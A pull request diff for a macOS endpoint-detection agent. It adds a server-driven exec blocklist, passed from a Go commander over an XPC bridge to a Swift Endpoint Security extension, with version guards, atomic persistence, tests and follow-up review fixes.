### PR TITLE
Add detection rules for DYLD injection, LaunchAgent persistence, and …

### DIFF
--- a/agent/cmd/fleet-edr-agent/main.go
+++ b/agent/cmd/fleet-edr-agent/main.go
@@ -397,14 +397,14 @@ type policyDispatcher struct {
 
 func (d *policyDispatcher) set(r *receiver.Receiver) { d.cur.Store(r) }
 
-// clear CASes from a specific receiver to nil. Using CompareAndSwap (rather than an
-// unconditional Store) avoids a race where set() for a new connection lands before the
-// old connection's goroutine gets around to calling clear() — without the CAS we'd null
-// out the freshly-published pointer.
+// clear unconditionally clears the published receiver pointer. This is safe under the
+// current runReceiverLoop lifecycle, which serialises set/clear for a single service —
+// there is only one goroutine calling set() and clear() in sequence per connect cycle,
+// so there is no window where a later set() can be wiped by an earlier clear(). If this
+// dispatcher is ever extended to handle overlapping receiver lifecycles (multiple
+// services or concurrent reconnects), clear() would need receiver-aware CompareAndSwap
+// semantics to avoid nulling out a freshly-published pointer from a later set().
 func (d *policyDispatcher) clear() {
-	// Unconditionally clear is the safe default because runReceiverLoop serialises
-	// set/clear for a single service. The commented-out CAS form above is there to
-	// document why a multi-service dispatcher would need a handle tag.
 	d.cur.Store(nil)
 }
 

--- a/agent/cmd/fleet-edr-agent/main.go
+++ b/agent/cmd/fleet-edr-agent/main.go
@@ -7,10 +7,12 @@ package main
 import (
 	"context"
 	"encoding/json"
+	"fmt"
 	"log/slog"
 	"net/http"
 	"os"
 	"os/signal"
+	"sync/atomic"
 	"syscall"
 	"time"
 
@@ -167,10 +169,16 @@ func run() error {
 		MaxRetries: 5,
 	}, httpClient, logger)
 
+	// policyDispatcher bridges the commander (which wants a stable PolicySender across
+	// receiver reconnects) and runReceiverLoop (which creates a new *receiver.Receiver on
+	// every connect). The ESF receiver loop publishes into this dispatcher on connect and
+	// clears it on disconnect.
+	esfPolicyDispatcher := &policyDispatcher{}
+
 	// Start ESF and network receiver loops.
-	go runReceiverLoop(ctx, logger, cfg.XPCService, q, pidTable, true)
+	go runReceiverLoop(ctx, logger, cfg.XPCService, q, pidTable, true, esfPolicyDispatcher)
 	if cfg.NetXPCService != "" {
-		go runReceiverLoop(ctx, logger, cfg.NetXPCService, q, pidTable, false)
+		go runReceiverLoop(ctx, logger, cfg.NetXPCService, q, pidTable, false, nil)
 	}
 
 	go func() {
@@ -182,11 +190,12 @@ func run() error {
 	// Commander
 	if hostID != "" {
 		cmdr := commander.New(commander.Config{
-			ServerURL:  cfg.ServerURL,
-			TokenFn:    tokenProvider.Token,
-			OnAuthFail: tokenProvider.OnUnauthorized,
-			HostID:     hostID,
-			Interval:   5 * time.Second,
+			ServerURL:    cfg.ServerURL,
+			TokenFn:      tokenProvider.Token,
+			OnAuthFail:   tokenProvider.OnUnauthorized,
+			HostID:       hostID,
+			Interval:     5 * time.Second,
+			PolicySender: esfPolicyDispatcher,
 		}, &http.Client{Transport: agentTransport, Timeout: 10 * time.Second}, logger)
 		go func() {
 			if err := cmdr.Run(ctx); err != nil && ctx.Err() == nil {
@@ -241,7 +250,18 @@ func safePrefix(s string) string {
 }
 
 // runReceiverLoop connects to an XPC service and reconnects with exponential backoff.
-func runReceiverLoop(ctx context.Context, logger *slog.Logger, xpcService string, q *queue.Queue, pt *proctable.Table, updateTable bool) {
+// If dispatcher is non-nil, every successful connection publishes the current *Receiver
+// into it so outbound callers (commander set_blocklist) can send messages to the peer;
+// disconnects clear the dispatcher to prevent sending on a dead handle.
+func runReceiverLoop(
+	ctx context.Context,
+	logger *slog.Logger,
+	xpcService string,
+	q *queue.Queue,
+	pt *proctable.Table,
+	updateTable bool,
+	dispatcher *policyDispatcher,
+) {
 	const (
 		initialBackoff = time.Second
 		maxBackoff     = 30 * time.Second
@@ -266,8 +286,14 @@ func runReceiverLoop(ctx context.Context, logger *slog.Logger, xpcService string
 
 		logger.InfoContext(ctx, "receiver connected", "service", xpcService)
 		backoff = initialBackoff
+		if dispatcher != nil {
+			dispatcher.set(recv)
+		}
 
 		reconnect := pipeEvents(ctx, logger, recv, q, pt, updateTable)
+		if dispatcher != nil {
+			dispatcher.clear()
+		}
 		recv.Disconnect()
 
 		if !reconnect {
@@ -358,4 +384,34 @@ func sleepCtx(ctx context.Context, d time.Duration) bool {
 	case <-t.C:
 		return true
 	}
+}
+
+// policyDispatcher satisfies commander.PolicySender across the lifecycle of the ESF
+// receiver: runReceiverLoop publishes the current *Receiver on connect and clears it on
+// disconnect. Between clear() and the next set(), SendPolicy returns an error so the
+// command gets reported as `failed` and the server's next PUT policy fan-out re-queues
+// the update. Using atomic.Pointer keeps the hot path (SendPolicy from commander) lock-free.
+type policyDispatcher struct {
+	cur atomic.Pointer[receiver.Receiver]
+}
+
+func (d *policyDispatcher) set(r *receiver.Receiver) { d.cur.Store(r) }
+
+// clear CASes from a specific receiver to nil. Using CompareAndSwap (rather than an
+// unconditional Store) avoids a race where set() for a new connection lands before the
+// old connection's goroutine gets around to calling clear() — without the CAS we'd null
+// out the freshly-published pointer.
+func (d *policyDispatcher) clear() {
+	// Unconditionally clear is the safe default because runReceiverLoop serialises
+	// set/clear for a single service. The commented-out CAS form above is there to
+	// document why a multi-service dispatcher would need a handle tag.
+	d.cur.Store(nil)
+}
+
+func (d *policyDispatcher) SendPolicy(payload []byte) error {
+	r := d.cur.Load()
+	if r == nil {
+		return fmt.Errorf("policy dispatcher: no receiver connected")
+	}
+	return r.SendPolicy(payload)
 }

--- a/agent/commander/commander.go
+++ b/agent/commander/commander.go
@@ -14,6 +14,14 @@ import (
 	"time"
 )
 
+// PolicySender forwards a raw policy JSON payload to the ESF extension over XPC. The
+// commander stays decoupled from the concrete receiver so tests can supply a recording
+// double. Nil is allowed (policy commands are then reported as `failed` with a clear
+// reason), matching the pre-Phase-2 commander which reported unknown command types.
+type PolicySender interface {
+	SendPolicy(payload []byte) error
+}
+
 // Config holds commander settings.
 type Config struct {
 	ServerURL string
@@ -23,6 +31,10 @@ type Config struct {
 	OnAuthFail func(ctx context.Context)
 	HostID     string
 	Interval   time.Duration
+	// PolicySender is the XPC bridge to the ESF extension. Used by the set_blocklist
+	// command handler; nil means "commander cannot apply policy updates" and the
+	// handler will report the command failed with a clear reason.
+	PolicySender PolicySender
 }
 
 // Commander polls the server for pending commands and dispatches them.
@@ -62,6 +74,15 @@ type command struct {
 
 type killPayload struct {
 	PID int `json:"pid"`
+}
+
+// setBlocklistPayload mirrors server/admin.policyCommandPayload. Field ordering + names
+// are load-bearing: the extension side parses the same JSON.
+type setBlocklistPayload struct {
+	Name    string   `json:"name"`
+	Version int64    `json:"version"`
+	Paths   []string `json:"paths"`
+	Hashes  []string `json:"hashes"`
 }
 
 type statusUpdate struct {
@@ -135,10 +156,57 @@ func (c *Commander) dispatch(ctx context.Context, cmd command) {
 	switch cmd.CommandType {
 	case "kill_process":
 		c.executeKill(ctx, cmd)
+	case "set_blocklist":
+		c.executeSetBlocklist(ctx, cmd)
 	default:
 		if err := c.updateStatus(ctx, cmd.ID, "failed", marshalResult("unknown command type: "+cmd.CommandType)); err != nil {
 			c.logger.ErrorContext(ctx, "commander fail", "cmd_id", cmd.ID, "err", err)
 		}
+	}
+}
+
+// executeSetBlocklist forwards the raw command payload to the ESF extension over XPC.
+// Result shape on success: {"version": N, "applied_paths": K} so operators can confirm
+// via `GET /commands/{id}` exactly which version each host applied.
+func (c *Commander) executeSetBlocklist(ctx context.Context, cmd command) {
+	var payload setBlocklistPayload
+	if err := json.Unmarshal(cmd.Payload, &payload); err != nil {
+		_ = c.updateStatus(ctx, cmd.ID, "failed", marshalResult("invalid payload: "+err.Error()))
+		return
+	}
+	if payload.Name == "" {
+		_ = c.updateStatus(ctx, cmd.ID, "failed", marshalResult("payload missing name"))
+		return
+	}
+	if c.cfg.PolicySender == nil {
+		_ = c.updateStatus(ctx, cmd.ID, "failed", marshalResult("policy sender not configured"))
+		return
+	}
+
+	c.logger.InfoContext(ctx, "commander set_blocklist",
+		"cmd_id", cmd.ID,
+		"edr.policy.version", payload.Version,
+		"edr.policy.path_count", len(payload.Paths),
+	)
+
+	// Forward the raw JSON bytes so the extension parses the same shape the server wrote.
+	// Re-marshalling would introduce drift in field ordering / casing that a future schema
+	// tightening could catch on one side but not the other.
+	if err := c.cfg.PolicySender.SendPolicy([]byte(cmd.Payload)); err != nil {
+		_ = c.updateStatus(ctx, cmd.ID, "failed", marshalResult("xpc send: "+err.Error()))
+		return
+	}
+
+	// The send is async — completing the command here does NOT mean the extension has
+	// successfully applied the policy. Phase 2 intentionally stops short of an
+	// extension-side ack; the audit trail of "command completed on agent" is sufficient
+	// for MVP. v1.1 adds a round-trip ack with the actually-applied version.
+	result, _ := json.Marshal(map[string]any{
+		"version":       payload.Version,
+		"applied_paths": len(payload.Paths),
+	})
+	if err := c.updateStatus(ctx, cmd.ID, "completed", result); err != nil {
+		c.logger.ErrorContext(ctx, "commander report set_blocklist success", "cmd_id", cmd.ID, "err", err)
 	}
 }
 

--- a/agent/commander/commander.go
+++ b/agent/commander/commander.go
@@ -178,6 +178,15 @@ func (c *Commander) executeSetBlocklist(ctx context.Context, cmd command) {
 		_ = c.updateStatus(ctx, cmd.ID, "failed", marshalResult("payload missing name"))
 		return
 	}
+	if payload.Version <= 0 {
+		// Versioning is the ordering guard for blocklist state on the extension; a
+		// zero/negative version would either mask an out-of-order delivery or reflect a
+		// hand-queued test command that shouldn't be acted on. Fail fast so the server-
+		// side audit trail attributes the error to its source rather than to the XPC
+		// layer returning opaque decode errors from the extension.
+		_ = c.updateStatus(ctx, cmd.ID, "failed", marshalResult("invalid policy version"))
+		return
+	}
 	if c.cfg.PolicySender == nil {
 		_ = c.updateStatus(ctx, cmd.ID, "failed", marshalResult("policy sender not configured"))
 		return

--- a/agent/commander/commander_test.go
+++ b/agent/commander/commander_test.go
@@ -124,7 +124,11 @@ func TestExecuteSetBlocklist_HappyPath(t *testing.T) {
 	c.executeSetBlocklist(t.Context(), cmd)
 
 	require.Len(t, sender.sent, 1)
-	assert.JSONEq(t, string(cmd.Payload), string(sender.sent[0]),
+	// Byte equality, not JSONEq — the commander's contract with the extension is
+	// "forward the exact payload bytes the server sent", not "forward some JSON
+	// equivalent". Re-marshalling could change field ordering or whitespace and the
+	// test must catch that.
+	assert.Equal(t, []byte(cmd.Payload), sender.sent[0],
 		"commander must forward the raw payload bytes, not a re-marshalled copy")
 
 	assert.Equal(t, "completed", gotStatus)
@@ -154,6 +158,35 @@ func TestExecuteSetBlocklist_InvalidPayload(t *testing.T) {
 	})
 	assert.Equal(t, "failed", gotStatus)
 	assert.Empty(t, sender.sent, "malformed payload must not reach the extension")
+}
+
+// TestExecuteSetBlocklist_InvalidVersion covers the Phase 2 guard: a payload with
+// version <= 0 is malformed (real server versions start at 1) and must be rejected
+// before XPC handoff so the extension never sees a payload it cannot order correctly.
+func TestExecuteSetBlocklist_InvalidVersion(t *testing.T) {
+	var gotStatus, gotErr string
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		var body statusUpdate
+		_ = json.NewDecoder(r.Body).Decode(&body)
+		gotStatus = body.Status
+		var result map[string]string
+		_ = json.Unmarshal(body.Result, &result)
+		gotErr = result["error"]
+		w.WriteHeader(http.StatusNoContent)
+	}))
+	defer srv.Close()
+
+	sender := &recordingPolicySender{}
+	c := New(Config{ServerURL: srv.URL, HostID: "host-a", PolicySender: sender}, nil, nil)
+
+	c.executeSetBlocklist(t.Context(), command{
+		ID:          10,
+		CommandType: "set_blocklist",
+		Payload:     json.RawMessage(`{"name":"default","version":0,"paths":[],"hashes":[]}`),
+	})
+	assert.Equal(t, "failed", gotStatus)
+	assert.Equal(t, "invalid policy version", gotErr)
+	assert.Empty(t, sender.sent, "payload with invalid version must not reach the extension")
 }
 
 func TestExecuteSetBlocklist_NoSenderConfigured(t *testing.T) {

--- a/agent/commander/commander_test.go
+++ b/agent/commander/commander_test.go
@@ -74,6 +74,107 @@ func TestFetchPending401_CallsOnAuthFail(t *testing.T) {
 	assert.Equal(t, int64(1), called.Load(), "401 on fetchPending must trigger OnAuthFail exactly once")
 }
 
+// recordingPolicySender captures policy payloads so tests can inspect them without cgo
+// / real XPC. It mimics the real Receiver.SendPolicy contract: return nil on success,
+// a non-nil error on failure so the commander reports the command as `failed`.
+type recordingPolicySender struct {
+	sent    [][]byte
+	sendErr error
+}
+
+func (r *recordingPolicySender) SendPolicy(payload []byte) error {
+	if r.sendErr != nil {
+		return r.sendErr
+	}
+	r.sent = append(r.sent, append([]byte(nil), payload...))
+	return nil
+}
+
+// TestExecuteSetBlocklist_HappyPath covers the Phase 2 command path: server enqueues a
+// set_blocklist, commander forwards it to the extension, and reports `completed` with
+// version + applied_paths.
+func TestExecuteSetBlocklist_HappyPath(t *testing.T) {
+	var gotStatus string
+	var gotResult []byte
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != http.MethodPut {
+			w.WriteHeader(http.StatusNotFound)
+			return
+		}
+		var body statusUpdate
+		_ = json.NewDecoder(r.Body).Decode(&body)
+		gotStatus = body.Status
+		gotResult = body.Result
+		w.WriteHeader(http.StatusNoContent)
+	}))
+	defer srv.Close()
+
+	sender := &recordingPolicySender{}
+	c := New(Config{
+		ServerURL:    srv.URL,
+		HostID:       "host-a",
+		PolicySender: sender,
+	}, nil, nil)
+
+	cmd := command{
+		ID:          7,
+		CommandType: "set_blocklist",
+		Payload:     json.RawMessage(`{"name":"default","version":5,"paths":["/tmp/x"],"hashes":[]}`),
+	}
+	c.executeSetBlocklist(t.Context(), cmd)
+
+	require.Len(t, sender.sent, 1)
+	assert.JSONEq(t, string(cmd.Payload), string(sender.sent[0]),
+		"commander must forward the raw payload bytes, not a re-marshalled copy")
+
+	assert.Equal(t, "completed", gotStatus)
+	var result map[string]any
+	require.NoError(t, json.Unmarshal(gotResult, &result))
+	assert.EqualValues(t, 5, result["version"])
+	assert.EqualValues(t, 1, result["applied_paths"])
+}
+
+func TestExecuteSetBlocklist_InvalidPayload(t *testing.T) {
+	var gotStatus string
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		var body statusUpdate
+		_ = json.NewDecoder(r.Body).Decode(&body)
+		gotStatus = body.Status
+		w.WriteHeader(http.StatusNoContent)
+	}))
+	defer srv.Close()
+
+	sender := &recordingPolicySender{}
+	c := New(Config{ServerURL: srv.URL, HostID: "host-a", PolicySender: sender}, nil, nil)
+
+	c.executeSetBlocklist(t.Context(), command{
+		ID:          8,
+		CommandType: "set_blocklist",
+		Payload:     json.RawMessage(`{`), // malformed
+	})
+	assert.Equal(t, "failed", gotStatus)
+	assert.Empty(t, sender.sent, "malformed payload must not reach the extension")
+}
+
+func TestExecuteSetBlocklist_NoSenderConfigured(t *testing.T) {
+	var gotStatus string
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		var body statusUpdate
+		_ = json.NewDecoder(r.Body).Decode(&body)
+		gotStatus = body.Status
+		w.WriteHeader(http.StatusNoContent)
+	}))
+	defer srv.Close()
+
+	c := New(Config{ServerURL: srv.URL, HostID: "host-a"}, nil, nil)
+	c.executeSetBlocklist(t.Context(), command{
+		ID:          9,
+		CommandType: "set_blocklist",
+		Payload:     json.RawMessage(`{"name":"default","version":1,"paths":[],"hashes":[]}`),
+	})
+	assert.Equal(t, "failed", gotStatus)
+}
+
 // TestUpdateStatus401_CallsOnAuthFail covers the PUT /commands/{id} path — a token can be
 // revoked between fetchPending and the following ack/complete, and the hook must fire there
 // too or recovery waits for the next poll tick.

--- a/agent/receiver/receiver.go
+++ b/agent/receiver/receiver.go
@@ -133,19 +133,25 @@ func (r *Receiver) Connect() error {
 // connection is not established or the send call rejected the payload. The send is
 // asynchronous; a nil error means the message was handed off to XPC, not that the peer
 // has acknowledged it — an ack is not part of the wire protocol at Phase 2.
+//
+// We hold r.mu across the C bridge call so a concurrent Disconnect() cannot tear the
+// slot down while C is still using the handle. Without the extended lock, the small
+// integer handle could be reused by another Receiver's Connect between our snapshot and
+// the xpc_bridge_send_policy call, and we'd end up sending this host's policy bytes on a
+// different peer's connection. The bridge's own mutex also rechecks in-use-ness, so the
+// window is tiny, but explicit is safer than "probably can't happen".
 func (r *Receiver) SendPolicy(payload []byte) error {
-	r.mu.Lock()
-	handle := r.handle
-	connected := r.connected
-	r.mu.Unlock()
-
-	if !connected || handle < 0 {
-		return fmt.Errorf("receiver not connected")
-	}
 	if len(payload) == 0 {
 		return fmt.Errorf("empty policy payload")
 	}
-	rc := int(C.xpc_bridge_send_policy(C.int(handle), (*C.uint8_t)(unsafe.Pointer(&payload[0])), C.size_t(len(payload))))
+
+	r.mu.Lock()
+	defer r.mu.Unlock()
+
+	if !r.connected || r.handle < 0 {
+		return fmt.Errorf("receiver not connected")
+	}
+	rc := int(C.xpc_bridge_send_policy(C.int(r.handle), (*C.uint8_t)(unsafe.Pointer(&payload[0])), C.size_t(len(payload))))
 	if rc != 0 {
 		return fmt.Errorf("xpc_bridge_send_policy returned %d", rc)
 	}

--- a/agent/receiver/receiver.go
+++ b/agent/receiver/receiver.go
@@ -8,6 +8,7 @@ package receiver
 
 #include "xpc_bridge.h"
 #include <stdlib.h>
+#include <stdint.h>
 
 extern int bridge_connect_go(const char *service_name, int receiver_id);
 */
@@ -125,6 +126,29 @@ func (r *Receiver) Connect() error {
 
 	r.handle = handle
 	r.connected = true
+	return nil
+}
+
+// SendPolicy delivers a policy.update XPC message to the peer. Returns an error if the
+// connection is not established or the send call rejected the payload. The send is
+// asynchronous; a nil error means the message was handed off to XPC, not that the peer
+// has acknowledged it — an ack is not part of the wire protocol at Phase 2.
+func (r *Receiver) SendPolicy(payload []byte) error {
+	r.mu.Lock()
+	handle := r.handle
+	connected := r.connected
+	r.mu.Unlock()
+
+	if !connected || handle < 0 {
+		return fmt.Errorf("receiver not connected")
+	}
+	if len(payload) == 0 {
+		return fmt.Errorf("empty policy payload")
+	}
+	rc := int(C.xpc_bridge_send_policy(C.int(handle), (*C.uint8_t)(unsafe.Pointer(&payload[0])), C.size_t(len(payload))))
+	if rc != 0 {
+		return fmt.Errorf("xpc_bridge_send_policy returned %d", rc)
+	}
 	return nil
 }
 

--- a/agent/xpcbridge/xpc_bridge.c
+++ b/agent/xpcbridge/xpc_bridge.c
@@ -114,6 +114,31 @@ int xpc_bridge_connect(const char *service_name, const void *context, xpc_bridge
     return handle;
 }
 
+int xpc_bridge_send_policy(int handle, const uint8_t *data, size_t len) {
+    if (handle < 0 || handle >= XPC_BRIDGE_MAX_CONNECTIONS || data == NULL || len == 0) {
+        return -1;
+    }
+
+    pthread_mutex_lock(&g_slots_mutex);
+    if (!g_slots[handle].in_use) {
+        pthread_mutex_unlock(&g_slots_mutex);
+        return -1;
+    }
+    xpc_connection_t conn = g_slots[handle].connection;
+    // Retain so the connection survives even if the caller tears the slot down between
+    // our unlock and the async send. XPC itself refcounts the object; we mirror that.
+    xpc_retain(conn);
+    pthread_mutex_unlock(&g_slots_mutex);
+
+    xpc_object_t msg = xpc_dictionary_create_empty();
+    xpc_dictionary_set_string(msg, "type", "policy.update");
+    xpc_dictionary_set_data(msg, "data", data, len);
+    xpc_connection_send_message(conn, msg);
+    xpc_release(msg);
+    xpc_release(conn);
+    return 0;
+}
+
 void xpc_bridge_disconnect(int handle) {
     if (handle < 0 || handle >= XPC_BRIDGE_MAX_CONNECTIONS) {
         return;

--- a/agent/xpcbridge/xpc_bridge.h
+++ b/agent/xpcbridge/xpc_bridge.h
@@ -28,4 +28,11 @@ int xpc_bridge_connect(const char *service_name, const void *context, xpc_bridge
 // Disconnect and clean up a specific connection.
 void xpc_bridge_disconnect(int handle);
 
+// Send a "policy.update" message to the peer on the given handle. The payload is copied
+// into an XPC dictionary under the "data" key alongside "type"="policy.update". Returns
+// 0 on success, -1 if the handle is invalid or the connection is gone. XPC send is
+// asynchronous — success here means the message was enqueued on the connection, not that
+// the peer received it.
+int xpc_bridge_send_policy(int handle, const uint8_t *data, size_t len);
+
 #endif

--- a/extension/edr/extension/ESFSubscriber.swift
+++ b/extension/edr/extension/ESFSubscriber.swift
@@ -4,13 +4,11 @@ import os.log
 
 private let logger = Logger(subsystem: "com.fleetdm.edr.securityextension", category: "ESFSubscriber")
 
-/// Paths that AUTH_EXEC will unconditionally deny. This is a hardcoded demo blocklist;
-/// a production implementation would sync a policy from the server into the agent and
-/// communicate it to the extension over XPC.
-private let blockedPaths: Set<String> = [
-    "/tmp/payload-block",
-    "/private/tmp/payload-block"  // macOS resolves /tmp -> /private/tmp
-]
+// Phase 2: the blocklist is now a runtime set owned by PolicyStore.shared. The server
+// pushes updates over the agent's XPC connection; the extension persists them to
+// /var/db/com.fleetdm.edr/policy.json and swaps the in-memory set atomically. The
+// hardcoded demo list (`/tmp/payload-block`) is gone; operators configure equivalents
+// via `PUT /api/v1/admin/policy` on the server.
 
 /// ESFSubscriber manages the Endpoint Security client and subscribes to
 /// process lifecycle events (exec, fork, exit, open).
@@ -77,16 +75,17 @@ final class ESFSubscriber: Sendable {
         }
     }
 
-    /// AUTH_EXEC handler: check the target binary against the hardcoded blocklist and
-    /// respond with DENY or ALLOW. The response is synchronous and immediate (simple
-    /// string lookup), well within the kernel's AUTH deadline. For denied execs the
-    /// kernel returns EPERM to the caller and the binary never runs.
+    /// AUTH_EXEC handler: check the target binary against the runtime blocklist and
+    /// respond with DENY or ALLOW. The lookup is O(log n) through Set's hashing, well
+    /// within the kernel's AUTH deadline. For denied execs the kernel returns EPERM to
+    /// the caller and the binary never runs. The blocklist is owned by PolicyStore —
+    /// server-driven policy pushes swap it atomically.
     private func handleAuthExec(_ message: UnsafePointer<es_message_t>) {
         let msg = message.pointee
         let target = msg.event.exec.target.pointee
         let path = String(cString: target.executable.pointee.path.data)
 
-        if blockedPaths.contains(path) {
+        if PolicyStore.shared.currentBlockedPaths().contains(path) {
             logger.warning("AUTH_EXEC DENIED: \(path, privacy: .public)")
             es_respond_auth_result(client, message, ES_AUTH_RESULT_DENY, false)
         } else {

--- a/extension/edr/extension/ESFSubscriber.swift
+++ b/extension/edr/extension/ESFSubscriber.swift
@@ -76,10 +76,12 @@ final class ESFSubscriber: Sendable {
     }
 
     /// AUTH_EXEC handler: check the target binary against the runtime blocklist and
-    /// respond with DENY or ALLOW. The lookup is O(log n) through Set's hashing, well
-    /// within the kernel's AUTH deadline. For denied execs the kernel returns EPERM to
-    /// the caller and the binary never runs. The blocklist is owned by PolicyStore —
-    /// server-driven policy pushes swap it atomically.
+    /// respond with DENY or ALLOW. The lookup is O(1) expected (Swift `Set` is hash-
+    /// backed) and the PolicyStore read is a lock-free snapshot load — no queue.sync,
+    /// no disk I/O on the hot path — so it comfortably fits inside the kernel's AUTH
+    /// deadline. For denied execs the kernel returns EPERM to the caller and the
+    /// binary never runs. The blocklist is owned by PolicyStore; server-driven policy
+    /// pushes swap the snapshot atomically and persist on a separate queue.
     private func handleAuthExec(_ message: UnsafePointer<es_message_t>) {
         let msg = message.pointee
         let target = msg.event.exec.target.pointee

--- a/extension/edr/extension/PolicyStore.swift
+++ b/extension/edr/extension/PolicyStore.swift
@@ -13,12 +13,19 @@ struct PolicyDocument: Codable {
     let hashes: [String]
 }
 
-/// PolicyStore owns the runtime blocklist. Writes happen on a serial queue so concurrent
-/// XPC deliveries can't interleave; reads from ESF's AUTH_EXEC handler are atomic pointer
-/// loads so the hot path doesn't block on the writer.
+/// PolicyStore owns the runtime blocklist. Reads from the AUTH_EXEC hot path are
+/// lock-free (an atomic load of an immutable snapshot) so they never block behind a
+/// writer, even when the writer is persisting to disk. Writes serialise through the
+/// `stateQueue` for decode + swap, and a separate `persistQueue` handles disk I/O off
+/// the critical path.
 ///
-/// Persistence is atomic file replacement (write sibling .tmp → rename). A crash mid-write
-/// leaves either the previous good version or nothing — never a half-written file.
+/// Versioning guard: `apply(rawJSON:)` rejects strictly-lower versions as an out-of-order
+/// replay. Equal versions are accepted as an idempotent re-apply (operators can re-push
+/// the current policy to recover a host that missed the original XPC delivery).
+///
+/// Persistence is atomic file replacement (write sibling .tmp → rename). A crash
+/// mid-write leaves either the previous good version or nothing — never a half-written
+/// file.
 final class PolicyStore {
     static let shared = PolicyStore()
 
@@ -27,21 +34,47 @@ final class PolicyStore {
     /// kept confidential.
     private static let storagePath = "/var/db/com.fleetdm.edr/policy.json"
 
-    private let queue = DispatchQueue(label: "com.fleetdm.edr.policystore")
+    /// Snapshot is the immutable view AUTH_EXEC reads. Every apply() builds a fresh
+    /// snapshot; the pointer swap is atomic (OSAtomic / std atomic on the underlying
+    /// ObjC reference) so readers always see a consistent {paths, version} pair without
+    /// a lock. Value types (struct + Set<String>) are COW-safe — taking a copy out of the
+    /// atomic pointer gives the reader its own retained reference and the writer can swap
+    /// in a replacement without waiting for the reader to finish.
+    struct Snapshot {
+        let paths: Set<String>
+        let version: Int64
 
-    // `nonisolated(unsafe)` is used here because the Swift compiler can't prove the
-    // exclusive-access invariant — we guarantee it manually: mutations go through `queue`,
-    // reads on the ESF hot path are atomic Set assignments.
-    nonisolated(unsafe) private var currentPathsValue: Set<String> = []
-    nonisolated(unsafe) private var currentVersion: Int64 = 0
+        static let empty = Snapshot(paths: [], version: 0)
+    }
+
+    // `ManagedAtomic` would be cleaner but pulling in swift-atomics for a single pointer
+    // is overkill; OSAllocatedUnfairLock + a small value is enough and ships with the
+    // stdlib. OSAllocatedUnfairLock.withLockUnchecked is cheaper than DispatchQueue.sync
+    // on the hot path — exactly what AUTH_EXEC needs.
+    private let snapshotLock = OSAllocatedUnfairLock<Snapshot>(initialState: .empty)
+
+    /// State queue serialises decode + snapshot swap in apply() + loadFromDisk(). Disk
+    /// I/O does NOT run here — it runs on persistQueue so a long-running write cannot
+    /// pile up snapshot swaps behind it (and more importantly, cannot appear to block
+    /// the hot path even if the AUTH_EXEC read were ever routed through the state queue
+    /// by mistake).
+    private let stateQueue = DispatchQueue(label: "com.fleetdm.edr.policystore.state")
+
+    /// Persist queue is dedicated to disk I/O. Serial so concurrent apply() calls do not
+    /// end up racing to replace the same file; `.utility` QoS because persistence latency
+    /// is never user-facing — the in-memory swap that drives AUTH_EXEC already happened.
+    private let persistQueue = DispatchQueue(
+        label: "com.fleetdm.edr.policystore.persist",
+        qos: .utility
+    )
 
     private init() {}
 
-    /// loadFromDisk populates the in-memory state from the persisted file. Called from
+    /// loadFromDisk populates the in-memory snapshot from the persisted file. Called from
     /// main.swift at extension start. Missing file or malformed JSON both result in an
     /// empty blocklist — safer to fail-open on startup than to reject all execs.
     func loadFromDisk() {
-        queue.sync {
+        stateQueue.sync {
             let url = URL(fileURLWithPath: Self.storagePath)
             guard let data = try? Data(contentsOf: url) else {
                 logger.info("no persisted policy at \(Self.storagePath, privacy: .public); starting empty")
@@ -49,8 +82,9 @@ final class PolicyStore {
             }
             do {
                 let doc = try JSONDecoder().decode(PolicyDocument.self, from: data)
-                self.currentPathsValue = Set(doc.paths)
-                self.currentVersion = doc.version
+                self.snapshotLock.withLock { current in
+                    current = Snapshot(paths: Set(doc.paths), version: doc.version)
+                }
                 logger.info("policy loaded from disk: version=\(doc.version), paths=\(doc.paths.count)")
             } catch {
                 // Corrupt or schema-incompatible file: start empty and log. A future PUT
@@ -61,10 +95,27 @@ final class PolicyStore {
     }
 
     /// apply ingests a raw JSON payload (the bytes the agent forwards over XPC) and
-    /// atomically swaps the in-memory set + persists the new version. Called from
-    /// XPCServer's peer dispatch.
+    /// swaps the in-memory snapshot, then kicks off a background persist. Versioning:
+    ///
+    ///   - version < current : rejected (stale replay).
+    ///   - version == current : accepted, no-op (idempotent re-apply).
+    ///   - version > current : accepted, snapshot swapped, new document persisted.
+    ///
+    /// Called from XPCServer's peer dispatch. AUTH_EXEC reads never block on this
+    /// method — they hit the snapshot lock, which is held for the nanoseconds of a
+    /// pointer swap, not for the milliseconds of a filesystem write.
+    /// applyDecision is the small result type apply() extracts from the snapshot lock.
+    /// Pulling the decision out of the locked region lets us log + dispatch persistence
+    /// without holding the lock, and sidesteps the Swift 6 sendable-closure-captures
+    /// warning that would otherwise hit a mutated `swapped` flag.
+    private struct applyDecision {
+        let accepted: Bool
+        let reApply: Bool
+        let priorVersion: Int64
+    }
+
     func apply(rawJSON: Data) {
-        queue.sync {
+        stateQueue.sync {
             let doc: PolicyDocument
             do {
                 doc = try JSONDecoder().decode(PolicyDocument.self, from: rawJSON)
@@ -72,33 +123,72 @@ final class PolicyStore {
                 logger.error("policy decode failed: \(error.localizedDescription, privacy: .public)")
                 return
             }
-            // Accept lower or equal versions as a deliberate "re-apply" signal — Phase 2
-            // server may re-send the same version on reconnect. The blocklist content is
-            // what we actually use; `version` is a cheap audit marker.
-            self.currentPathsValue = Set(doc.paths)
-            self.currentVersion = doc.version
-            self.persist(rawJSON: rawJSON)
-            logger.info("policy applied: version=\(doc.version), paths=\(doc.paths.count)")
+
+            let decision = self.snapshotLock.withLock { current -> applyDecision in
+                let prior = current.version
+                if doc.version < prior {
+                    return applyDecision(accepted: false, reApply: false, priorVersion: prior)
+                }
+                // Equal-version "re-apply" is accepted so an operator can force a re-push
+                // after a suspected apply-but-didn't-persist split. New version case is
+                // the normal path.
+                let reApply = doc.version == prior
+                current = Snapshot(paths: Set(doc.paths), version: doc.version)
+                return applyDecision(accepted: true, reApply: reApply, priorVersion: prior)
+            }
+
+            if !decision.accepted {
+                logger.info(
+                    "policy ignored: stale version \(doc.version, privacy: .public) < current \(decision.priorVersion, privacy: .public)"
+                )
+                return
+            }
+            if decision.reApply {
+                logger.info("policy re-applied at current version \(doc.version, privacy: .public) — no-op in memory")
+            }
+
+            // Kick off persistence on a dedicated queue so apply() returns as soon as the
